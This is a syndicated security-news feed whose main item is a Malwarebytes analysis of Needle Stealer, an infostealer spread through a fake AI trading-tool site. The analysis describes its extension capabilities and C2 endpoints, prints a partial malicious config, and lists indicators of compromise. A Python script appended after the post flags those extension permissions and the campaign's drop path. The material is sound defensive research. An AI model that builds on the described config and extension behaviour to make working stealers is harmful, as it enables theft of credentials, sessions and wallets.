This phased strategy ensures safe and effective adoption.</p><p>The post <a href="https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm">Agentic Data Pipelines: The Shift to Autonomous Data Engineering</a> appeared first on <a href="https://www.ishir.com/">ISHIR | Custom AI Software Development Dallas Fort-Worth Texas</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.ishir.com/">ISHIR | Custom AI Software Development Dallas Fort-Worth Texas</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Naresh Kumar">Naresh Kumar</a>. Read the original post at: <a href="https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm">https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm</a> </p>

The Time Is Now to Prepare for CRA Enforcement

  • Published date: 2026-04-22 00:00:00


<p>The post <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement">The Time Is Now to Prepare for CRA Enforcement</a> appeared first on <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a>.</p><div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_cra_enforcements.jpg" alt="Image of a network of hexagon shapes each containing different icons: one with a checkmark, one with a checkbox, one with a lock, one with a human form, one with a circle of stars." class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p style="background-color: #ffffff;">When the <a href="https://www.sonatype.com/resources/guides/eu-cyber-resilience-act-guide">EU Cyber Resilience Act (CRA)</a> was introduced into law in 2024, it represented one of the most significant regulatory shifts we’ve seen anywhere in the world, with implications for how organizations build, ship, and maintain software. It establishes cybersecurity requirements for hardware and software products sold within the European Union or produced by organizations operating in the EU, and is among the first international laws focused on cybersecurity requirements. 
It was also part of a <a href="https://www.sonatype.com/resources?category=158041693505">wave of global regulations</a> that put the security of software supply chains in the spotlight.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement">https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement</a> </p>

Malicious trading website drops malware that hands your browser to attackers

  • Published date: 2026-04-22 00:00:00


<p>The post <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers">Malicious trading website drops malware that hands your browser to attackers</a> appeared first on <a href="https://www.malwarebytes.com/">Malwarebytes</a>.</p><p>During our threat hunting, we found a campaign using the same malware loader from <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/from-fake-proton-vpn-sites-to-gaming-mods-this-windows-infostealer-is-everywhere" rel="noreferrer noopener">our previous research</a> to deliver a different threat: <strong>Needle Stealer</strong>, data-stealing malware designed to quietly harvest sensitive information from infected devices, including browser data, login sessions, and cryptocurrency wallets.</p><p>In this case, attackers used a website promoting a tool called <strong>TradingClaw</strong> (<code>tradingclaw[.]pro</code>), which claims to be an AI-powered assistant for TradingView. </p><p>TradingView is a legitimate platform used by traders to analyze financial markets, but this fake TradingClaw site is not part of TradingView, nor is it related to the legitimate startup <code>tradingclaw[.]chat</code>. Instead, it’s being used here as a lure to trick people into downloading malware.</p><h2 class="wp-block-heading" id="h-what-is-needle-stealer">What is Needle Stealer?</h2><p>Needle is a modular infostealer written in Golang. 
In simple terms, that means it’s built in pieces, so attackers can turn features on or off depending on what they want to steal.</p><p>According to its control panel, Needle includes:</p><ul class="wp-block-list"> <li><strong>Needle Core</strong>: The main component, with features like form grabbing (capturing data you enter into websites) and clipboard hijacking</li> <li><strong>Extension module</strong>: Controls browsers, redirects traffic, injects scripts, and replaces downloads</li> <li><strong>Desktop wallet spoofer</strong>: Targets cryptocurrency wallet apps like Ledger, Trezor, and Exodus</li> <li><strong>Browser wallet spoofer</strong>: Targets browser-based wallets like MetaMask and Coinbase, including attempts to extract seed phrases</li> </ul><p>The panel also shows a “coming soon” feature to generate fake Google or Cloudflare-style pages, suggesting the attackers plan to expand into more advanced phishing techniques.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="778" height="488" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-Needle-Panel.png" alt="Needle Stealer panel" class="wp-image-402735"><figcaption class="wp-element-caption"><em>Needle Stealer panel</em></figcaption></figure><p id="h-in-this-blog-post-we-analyze-the-distribution-of-the-stealer-through-a-fake-website-related-to-an-ai-service-called-tradingclaw-we-have-detected-that-the-same-stealer-is-also-distributed-by-other-malware-such-as-amadey-and-gcleaner">In this article, we analyze the distribution of the stealer through a fake website related to an AI service called <strong>TradingClaw</strong>. We have detected that the same stealer is also distributed by other malware such as Amadey and GCleaner. 
</p><h2 class="wp-block-heading" id="h-analysis-of-the-tradingclaw-campaign">Analysis of the TradingClaw campaign</h2><p>In this campaign, the malware is distributed through a fake website advertising TradingClaw as an AI trading tool.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="972" height="522" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-1.jpeg" alt="Malicious TradingClaw website" class="wp-image-402739"><figcaption class="wp-element-caption"><em>Malicious TradingClaw website</em></figcaption></figure><p>The site itself behaves selectively. In some cases, visitors are shown the fake TradingClaw page, while in others they are redirected to a different site (<code>studypages[.]com</code>). This kind of filtering is commonly used by attackers to avoid detection and only show the malicious content to intended targets. Search engines, for example, see the Studypages version:</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="205" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-studypages.png?w=1024" alt="Studypages fake page" class="wp-image-402741"><figcaption class="wp-element-caption"><em>Google results show the Studypages fake page</em></figcaption></figure><p>If a user proceeds, they are prompted to download a ZIP file. This file contains the first stage of the infection chain.</p><p>As in the previous campaign, the attack relies on a technique called DLL hijacking. In simple terms, this means the malware disguises itself as a legitimate file that a trusted program will load automatically. When the program runs, it unknowingly executes the malicious code instead.</p><p>In this case, the DLL loader (named <code>iviewers.dll</code>) is executed first. 
It then loads a second-stage DLL, which ultimately injects the Needle Stealer into a legitimate Windows process (<code>RegAsm.exe</code>) using a technique known as process hollowing.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="308" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-RegAsmprocess.png?w=1024" alt="Needle Stealer injected in RegAsm.exe process" class="wp-image-402746"><figcaption class="wp-element-caption"><em>Needle Stealer injected in RegAsm.exe process</em></figcaption></figure><p>The stealer is developed in Golang, and most of the functions are implemented in the “ext” package. </p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="345" height="533" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-exepackage.png" alt="Part of the “exe” package" class="wp-image-402747"><figcaption class="wp-element-caption"><em>Part of the “exe” package</em></figcaption></figure><h2 class="wp-block-heading">What the malware does</h2><p>Once installed, the Needle core module can:</p><ul class="wp-block-list"> <li>Take screenshots of the infected system</li> <li>Steal browser data, including history, cookies, and saved information</li> <li>Extract data from apps like Telegram and FTP clients</li> <li>Collect files such as .txt documents and wallet data</li> <li>Steal cryptocurrency wallet information</li> </ul><p>One of the more concerning features is its ability to install malicious browser extensions.</p><h2 class="wp-block-heading">Malicious browser extensions</h2><p>The stealer also supports the distribution of malicious browser extensions, giving attackers a powerful way to take control of the victim’s browser.</p><p>We identified multiple variations of these extensions, each with slightly different file structures and components. 
Behind the scenes, the malware uses built-in Golang features to unpack a hidden ZIP archive (often named <code>base.zip</code> or <code>meta.zip</code>) that contains the extension files, along with a configuration file (<code>cfg.json</code>). </p><p>Partial <code>cfg.json</code> config file:</p><pre class="wp-block-code"><code>{
  "extension_host": {},
  "api_key": "…
  "server_url": "https://C2/api/v2",
  "self_destruct": true,
  "base_extension": true,
  "ext_manifest": {
    "account_extension_type": 0,
    "active_permissions": {
      "api": [
        "history",
        "notifications",
        "storage",
        "tabs",
        "webNavigation",
        "declarativeNetRequest",
        "scripting",
        "declarativeNetRequestWithHostAccess",
        "sidePanel"
      ],
      "explicit_host": [ "&lt;all_urls&gt;" ],
      "manifest_permissions": [],
      "scriptable_host": [ "&lt;all_urls&gt;" ]
    },
    "commands": {
      "_execute_action": { "was_assigned": true }
    },
    …</code></pre><p>This configuration file is key. It tells the malware where to send stolen data (the command-and-control server), which malicious extension to install, and which features to enable.</p><p>The stealer extension is dropped in a random folder under <code>%LOCALAPPDATA%\Packages\Extensions</code>. The folder contains three main files: <code>popup.js</code>, <code>content.js</code>, and <code>background.js</code>.
</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="990" height="355" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-extension.png" alt="The malicious extension dropped" class="wp-image-402758"><figcaption class="wp-element-caption"><em>The malicious extension dropped</em></figcaption></figure><p>The extensions analyzed have Google-related names.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="895" height="736" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-translate.png" alt="The fake malicious extension on Edge Browser" class="wp-image-402759"><figcaption class="wp-element-caption"><em>The fake malicious extension on Edge Browser</em></figcaption></figure><h2 class="wp-block-heading" id="h-what-the-malicious-extensions-can-do">What the malicious extensions can do</h2><p>The extension gives attackers near full control over the browser, with capabilities that go far beyond typical malware.</p><p>It can:</p><ul class="wp-block-list"> <li><strong>Connect to a remote server</strong> using a built-in API key and regularly check in for instructions. It can also switch to backup domains if the main server goes offline.</li> <li><strong>Generate a unique ID</strong> to track the infected user over time.</li> <li><strong>Collect full browsing history</strong> and send it to a remote server (<code>/upload</code>).</li> <li><strong>Monitor what you’re doing in real time</strong>, including which sites you visit, and apply attacker-controlled redirect rules. 
This allows it to silently send you to different websites or alter what you see on a page, including injecting or hiding content.</li> <li><strong>Intercept downloads</strong>, cancel legitimate files, and replace them with malicious ones from attacker-controlled servers.</li> <li><strong>Inject scripts directly into web pages</strong>, enabling further data theft or manipulation.</li> <li><strong>Display fake browser notifications</strong> with attacker-controlled text and images.</li> </ul><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">How it communicates with attackers</h2><p>The stealer and its extension communicate with command-and-control (C2) servers using several API endpoints. These are essentially different “channels” used for specific tasks:</p><ul class="wp-block-list"> <li><code>/backup-domains/active</code>—retrieves backup servers to stay connected if the main one is blocked</li> <li><code>/upload</code>—sends stolen data back to the attackers</li> <li><code>/extension</code>—receives instructions for redirects, downloads, and notifications</li> <li><code>/scripts</code>—downloads malicious code to inject into web pages</li> </ul><h2 class="wp-block-heading">How to stay safe</h2><p>Scammers are increasingly using AI-themed tools to make fake websites look legitimate. In this case, a supposed “AI trading assistant” was used to trick people into installing malware.</p><p>To reduce your risk:</p><ul class="wp-block-list"> <li><strong>Download software only from official websites</strong>. If a tool claims to work with a well-known platform, check the platform’s official site to confirm it’s real.</li> <li><strong>Check who created the file before running it</strong>. Look at the publisher name and avoid anything that looks unfamiliar or inconsistent.</li> <li><strong>Review your browser extensions regularly</strong>. 
Remove anything you don’t recognize, especially extensions you didn’t knowingly install.</li> </ul><h2 class="wp-block-heading" id="h-what-to-do-if-you-think-you-ve-been-affected">What to do if you think you’ve been affected</h2><p>If you think you may have downloaded this infostealer:</p><ul class="wp-block-list"> <li>Check EDR and firewall logs for communications with the C2s listed in the IOCs section below.</li> <li>From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Change all passwords and enable 2FA for accounts you have accessed from this machine.</li> <li>Check the folder <code>%LOCALAPPDATA%\Packages\Extensions</code> and look for suspicious browser extensions.</li> <li>If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.</li> <li><a href="https://www.malwarebytes.com/solutions/virus-scanner" rel="noreferrer noopener">Run a full scan with Malwarebytes</a>.</li> </ul><h2 class="wp-block-heading" id="h-indicators-of-compromise-iocs">Indicators of Compromise (IOCs)</h2><p><strong>Hashes</strong></p><p><code>95dcac62fc15e99d112d812f7687292e34de0e8e0a39e4f12082f726fa1b50ed</code></p><p><code>0d10a6472facabf7d7a8cfd2492fc990b890754c3d90888ef9fe5b2d2cca41c0</code></p><p><strong>Domains</strong></p><p><code>Tradingclaw[.]pro</code>: fake website</p><p><code>Chrocustumapp[.]com</code>: related to malicious extension</p><p><code>Chrocustomreversal[.]com</code>: related to malicious extension</p><p><code>google-services[.]cc</code>: related to malicious extension</p><p><code>Coretest[.]digital</code>: C2 panel</p><p><code>Reisen[.]work</code>: C2 panel</p><p><strong>IPs</strong></p><p><code>178[.]16[.]55[.]234</code>: C2 panel</p><p><code>185[.]11[.]61[.]149</code>: C2 panel</p><p><code>37[.]221[.]66[.]27</code>: C2 panel</p><p><code>2[.]56[.]179[.]16</code>: C2 panel</p><p><code>178[.]16[.]54[.]109</code>: C2 panel</p><p><code>209[.]17[.]118[.]17</code>: C2 panel</p><p><code>162[.]216[.]5[.]130</code>: C2 panel</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers">https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers</a> </p>
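As an added example (not code from the Malwarebytes post), the Python triage helper below reads a config in the shape of the partial cfg.json shown above and maps the granted extension permissions onto the behaviours the post lists (history harvesting, navigation tracking, redirects, script injection, fake notifications), then checks the install path against the drop location the post names. The server URL, install path and extension name are constructed placeholders, and the permission-to-behaviour groupings are this example's own assumption.

```python
"""Permission triage for a sideloaded browser extension (added example, not the
post's code). It reads a cfg.json-shaped document like the partial one shown in
the write-up and maps the granted permissions onto the behaviours described
there. Sample data is constructed; the capability groupings are an assumption."""
import json
import ntpath
from dataclasses import dataclass
from urllib.parse import urlparse

# Which extension permissions enable each behaviour the post describes.
CAPABILITIES = {
    "harvest browsing history": {"history"},
    "watch navigation in real time": {"tabs", "webNavigation"},
    "redirect or block requests": {"declarativeNetRequest"},
    "redirect requests on any host": {"declarativeNetRequestWithHostAccess"},
    "inject scripts into pages": {"scripting"},
    "show attacker-controlled notifications": {"notifications"},
}
# Behaviours that are only severe when paired with broad host access.
HOST_SCOPED = {"inject scripts into pages", "redirect requests on any host"}
# Drop location named in the post (random folder under %LOCALAPPDATA%\Packages\Extensions).
DROP_PATH_FRAGMENT = ntpath.normcase("\\Packages\\Extensions")
# The analysed extensions carried Google-related names.
BRAND_LURE_WORDS = ("google", "chrome")


@dataclass(frozen=True)
class Finding:
    severity: str  # "high", "medium" or "info"
    detail: str


def load_config(text: str) -> dict:
    """Parse a cfg.json-style document; reject anything without the permission block."""
    cfg = json.loads(text)
    if "active_permissions" not in cfg.get("ext_manifest", {}):
        raise ValueError("ext_manifest.active_permissions missing")
    return cfg


def assess(cfg: dict, install_path: str, display_name: str) -> list:
    """Return findings for one extension, ordered high -> medium -> info."""
    perms = cfg["ext_manifest"]["active_permissions"]
    api = set(perms.get("api", []))
    hosts = set(perms.get("explicit_host", [])) | set(perms.get("scriptable_host", []))
    all_urls = "<all_urls>" in hosts
    findings = []
    if all_urls:
        findings.append(Finding("high", "host access to every site (<all_urls>)"))
    for behaviour, needed in CAPABILITIES.items():
        if needed <= api:  # every permission the behaviour needs was granted
            sev = "high" if behaviour in HOST_SCOPED and all_urls else "medium"
            findings.append(Finding(sev, f"{behaviour} via {', '.join(sorted(needed))}"))
    # A Web Store install lives in the browser profile; the post's samples did not.
    if DROP_PATH_FRAGMENT in ntpath.normcase(install_path):
        findings.append(Finding("high", "loaded from the drop location seen in the campaign"))
    if any(w in display_name.lower() for w in BRAND_LURE_WORDS):
        findings.append(Finding("info", f"brand-mimicking name: {display_name!r}"))
    if cfg.get("server_url"):
        findings.append(Finding("info", f"hard-coded server: {urlparse(cfg['server_url']).hostname}"))
    order = {"high": 0, "medium": 1, "info": 2}
    return sorted(findings, key=lambda f: order[f.severity])


def risk_level(findings: list) -> str:
    """Collapse findings into one verdict for an alert."""
    present = {f.severity for f in findings}
    return "high" if "high" in present else "medium" if "medium" in present else "low"


# Constructed sample in the shape of the post's partial cfg.json; all values are placeholders.
SAMPLE_CFG = """{
  "api_key": "PLACEHOLDER", "server_url": "https://c2.example.invalid/api/v2",
  "self_destruct": true, "base_extension": true,
  "ext_manifest": {"account_extension_type": 0, "active_permissions": {
    "api": ["history", "notifications", "storage", "tabs", "webNavigation",
            "declarativeNetRequest", "scripting", "declarativeNetRequestWithHostAccess",
            "sidePanel"],
    "explicit_host": ["<all_urls>"], "manifest_permissions": [],
    "scriptable_host": ["<all_urls>"]}}
}"""
# Constructed benign comparison: one site, storage only.
BENIGN_CFG = """{"ext_manifest": {"active_permissions": {
  "api": ["storage"], "explicit_host": ["https://example.com/*"], "scriptable_host": []}}}"""

if __name__ == "__main__":
    found = assess(load_config(SAMPLE_CFG),
                   r"C:\Users\victim\AppData\Local\Packages\Extensions\k3j9x2",
                   "Google Page Helper")  # constructed name
    for f in found:
        print(f"[{f.severity}] {f.detail}")
    print("verdict:", risk_level(found))
```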